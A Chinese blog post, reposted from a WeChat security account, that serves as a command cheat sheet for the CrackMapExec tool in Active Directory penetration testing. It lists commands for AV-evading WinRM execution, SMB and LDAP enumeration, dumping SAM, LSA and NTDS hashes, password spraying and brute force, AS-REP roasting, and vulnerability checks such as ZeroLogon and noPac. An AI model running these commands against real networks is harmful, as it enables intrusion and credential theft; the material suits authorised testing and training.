内网渗透工具CrackMapExec的使用

admin 2023年12月22日11:06:18评论89 views字数 2917阅读9分43秒阅读模式

免责声明

本文发布的工具和脚本,仅用作测试和学习研究,禁止用于商业用途,不能保证其合法性,准确性,完整性和有效性,请根据情况自行判断。

文中所涉及的技术、思路及工具等相关知识仅供安全为目的的学习使用,任何人不得将其应用于非法用途及盈利等目的,间接使用文章中的任何工具、思路及技术,我方对于由此引起的法律后果概不负责。

介绍

CrackMapExec 也简称cme ,是一款内网域渗透的工具,可以对域进行信息收集或者一些常见域漏洞的探测。

内网渗透工具CrackMapExec的使用

下载

https://github.com/byt3bl33d3r/CrackMapExec

使用

1.使用winrm执行命令(躲避杀软)

通过winrm执行命令很多情况下可以绕过一些杀软的拦截

crackmapexec wimri 192.168.216.144 -u 'administrator' -p 'pass1234!' -x 'whoami'

2.smb 协议常用枚举功能

crackmapexec smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --groups  枚举域组
crackmapexec smb 192.168.1.0/24 --gen-relay-list relaylistOutputFilename.txt   枚举不需要smb签名的主机
crackmapexec smb <ip> -u user -p pass -M enum_av   枚举主机上的杀软
crackmapexec smb 192.168.216.144 -u 'test' -p 'ppt1234!'  --shares 列出共享 
 crackmapexec smb 192.168.216.144 -u 'test' -p 'ppt1234!' --sessions 枚举有效sessions
 crackmapexec smb 192.168.216.144 -u 'test' -p 'ppt1234!' --disks  列出磁盘
 crackmapexec smb 192.168.216.144 -u 'test' -p 'ppt1234!' --loggedon-users 枚举登录用户
 crackmapexec smb 192.168.216.144 -u 'test' -p 'ppt1234!' --users 枚举域用户
 crackmapexec smb 192.168.216.144 -u 'test' -p 'ppt1234!' --rid-brute  通过爆破RID枚举用户
 crackmapexec smb 192.168.216.144 -u 'test' -p 'ppt1234!' --pass-pol 获取域密码策略
 crackmapexec smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --local-auth 验证本地用户,并且测试登录

3.获取凭证 dump hash

当获取到高权限的用户可以使用–sam ,–lsa dump hash

crackmapexec wimri 192.168.216.144 -u 'administrator' -p 'pass1234!'  --sam/--lsa

4.导出域ntds

crackmapexec smb 192.168.216.144 -u 'administrator' -p 'pass1234!' --ntds

5.密码喷晒

crackmapexec smb 192.168.1.101 -u user1 user2 user3 -p Summer18   多个用户,一个密码进行喷晒
crackmapexec smb 192.168.1.101 -u /path/to/users.txt -p Summer18    使用users.txt 用户列表文件指定多用户喷晒
crackmapexec smb 192.168.1.101 -u Administrator -p /path/to/passwords.txt   爆破administrator用户密码

6.文件上传下载

crackmapexec smb 172.16.251.152 -u user -p pass --put-file /tmp/whoami.txt \Windows\Temp\whoami.txt   上传文件
crackmapexec smb 172.16.251.152 -u user -p pass --get-file  \Windows\Temp\whoami.txt /tmp/whoami.txt    下载文件

7.检测主机上是否运行spooler、 webdav 服务

crackmapexec smb <ip> -u 'user' -p 'pass' -M spooler  查看打印机服务
crackmapexec smb <ip> -u 'user' -p 'pass' -M webdav   查看webdav服务

8.枚举域用户

cme ldap 192.168.1.0/24 -u users.txt -p '' -k

9.ASREPRoast

没有已知域用户密码的情况下:

cme ldap 192.168.0.104 -u user.txt -p '' --asreproast output.txt

在拥有域内用户权限的情况下

cme ldap 192.168.0.104 -u harry -p pass --asreproast output.txt

10.查找非约束委派账户

cme ldap 192.168.0.104 -u harry -p pass --trusted-for-delegation

11.检测ESC8(adcs)漏洞利用 查看adcs服务器

crackmapexec run ldap <ip> -u user -p pass -M adcs

12.通过活动目录收集子网段信息

crackmapexec ldap <ip> -u <user> -p <pass> -M get-network
crackmapexec ldap <ip> -u <user> -p <pass> -M get-network -o ONLY_HOSTS=true
crackmapexec ldap <ip> -u <user> -p <pass> -M get-network -o ALL=true

13.查看具有DCsync权限用户

crackmapexec ldap lab-dc.lab.local -k --kdcHost lab-dc.lab.local -M daclread -o TARGET_DN="DC=lab,DC=LOCAL" ACTION=read RIGHTS=DCSync

14.收集bloodhound 信息

crackmapexec ldap <ip> -u user -p pass --bloodhound --ns ip --collection All

15.通过RDP协议屏幕截图

crackmapexec rdp <ip> -u <user> -p <password> --screenshot --screentime

16.扫描zerologo、petitpotam、nopac漏洞

crackmapexec smb <ip> -u '' -p '' -M zerologo
crackmapexec smb <ip> -u '' -p '' -M petitpotam
crackmapexec smb <ip> -u 'user' -p 'pass' -M nopac


原文始发于微信公众号(SecHub网络安全社区):内网渗透工具CrackMapExec的使用

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年12月22日11:06:18
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   内网渗透工具CrackMapExec的使用http://cn-sec.com/archives/2327182.html

发表评论

匿名网友 填写信息